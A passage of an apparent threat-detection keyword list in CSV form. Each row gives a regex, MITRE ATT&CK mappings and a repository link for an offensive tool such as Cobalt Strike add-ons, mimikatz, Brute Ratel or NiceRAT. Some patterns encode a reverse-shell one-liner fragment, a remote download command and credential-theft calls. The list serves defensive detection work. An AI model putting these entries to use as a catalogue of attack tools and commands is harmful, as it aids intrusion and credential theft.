APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","22","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" "*CRTInjectElevated*",".{0,1000}CRTInjectElevated.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","22","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" "*CRTInjectWithoutPid*",".{0,1000}CRTInjectWithoutPid.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","22","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" "*crunch * -o *.txt*",".{0,1000}crunch\s.{0,1000}\s\-o\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","crunch","Generate a dictionary file containing words with a minimum and maximum length","T1596 - T1596.001","TA0043","N/A","N/A","Credential Access","https://sourceforge.net/projects/crunch-wordlist/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*crunch 4 7 abcdefghijklmnopqrstuvwxyz1234567890 -o wordlist.txt*",".{0,1000}crunch\s4\s7\sabcdefghijklmnopqrstuvwxyz1234567890\s\-o\swordlist\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*crypt0p3g/bof-collection*",".{0,1000}crypt0p3g\/bof\-collection.{0,1000}","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "*crypto::capi*",".{0,1000}crypto\:\:capi.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*crypto::certificates*",".{0,1000}crypto\:\:certificates.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*crypto::certtohw*",".{0,1000}crypto\:\:certtohw.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*crypto::cng*",".{0,1000}crypto\:\:cng.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*crypto::extract*",".{0,1000}crypto\:\:extract.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*crypto::hash*",".{0,1000}crypto\:\:hash.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*crypto::keys*",".{0,1000}crypto\:\:keys.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*crypto::providers*",".{0,1000}crypto\:\:providers.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*crypto::sc*",".{0,1000}crypto\:\:sc.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*crypto::scauth*",".{0,1000}crypto\:\:scauth.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*crypto::stores*",".{0,1000}crypto\:\:stores.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*crypto::system*",".{0,1000}crypto\:\:system.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*crypto::tpminfo*",".{0,1000}crypto\:\:tpminfo.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*crypto_identifier*",".{0,1000}crypto_identifier.{0,1000}","offensive_tool_keyword","crypto_identifier","Crypto tool for pentest and ctf : try to uncipher data using multiple algorithms and block chaining modes. Usefull for a quick check on unknown cipher text and key dictionary","T1573 - T1558 - T1112","TA0001","N/A","N/A","Exploitation tools","https://github.com/Acceis/crypto_identifier","1","1","N/A","N/A","2","121","24","2018-01-04T11:04:56Z","2017-11-30T13:04:49Z" "*CryptUnprotectData(*",".{0,1000}CryptUnprotectData\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*cryptvortex *",".{0,1000}cryptvortex\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*crystal eval 'require ""process"";require ""socket"";*Socket.tcp*connect*Process.new*output.gets_to_end*",".{0,1000}crystal\seval\s\'require\s\""process\""\;require\s\""socket\""\;.{0,1000}Socket\.tcp.{0,1000}connect.{0,1000}Process\.new.{0,1000}output\.gets_to_end.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*cs2modrewrite.py*",".{0,1000}cs2modrewrite\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","570","110","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" "*cs2nginx.py*",".{0,1000}cs2nginx\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","570","110","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" "*csandker/Azure-AccessPermissions*",".{0,1000}csandker\/Azure\-AccessPermissions.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","1","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*CS-Avoid-killing*",".{0,1000}CS\-Avoid\-killing.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","786","145","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" "*CS-BOFs/lsass*",".{0,1000}CS\-BOFs\/lsass.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","99","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*csc.exe /t:exe /out:RandomName.exe Program.cs*",".{0,1000}csc\.exe\s\/t\:exe\s\/out\:RandomName\.exe\sProgram\.cs.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","10","8","759","138","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" "*csc.exe EfsPotato.cs *",".{0,1000}csc\.exe\sEfsPotato\.cs\s.{0,1000}","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","674","118","2023-12-14T14:30:15Z","2021-07-26T21:36:16Z" "*CScrandle_fileless.cs*",".{0,1000}CScrandle_fileless\.cs.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*cscript *wmi.vbs -h*",".{0,1000}cscript\s.{0,1000}wmi\.vbs\s\-h.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*cscript ..\\temp.vbs*",".{0,1000}cscript\s\.\.\\\\temp\.vbs.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "*cscript dl.vbs *http*/*.zip*.zip*",".{0,1000}cscript\sdl\.vbs\s.{0,1000}http.{0,1000}\/.{0,1000}\.zip.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","0","N/A","N/A","8","736","180","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" "*CsEnox/SeManageVolumeExploit*",".{0,1000}CsEnox\/SeManageVolumeExploit.{0,1000}","offensive_tool_keyword","SeManageVolumeExploit","This exploit grants full permission on C:\ drive for all users on the machine","T1046 - T1098 - T1222.002","TA0007 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/CsEnox/SeManageVolumeExploit","1","1","N/A","10","1","65","15","2023-05-29T05:41:16Z","2021-10-11T01:17:04Z" "*csexec/csexec_history*",".{0,1000}csexec\/csexec_history.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*csharp_inject_bof_inject*",".{0,1000}csharp_inject_bof_inject.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 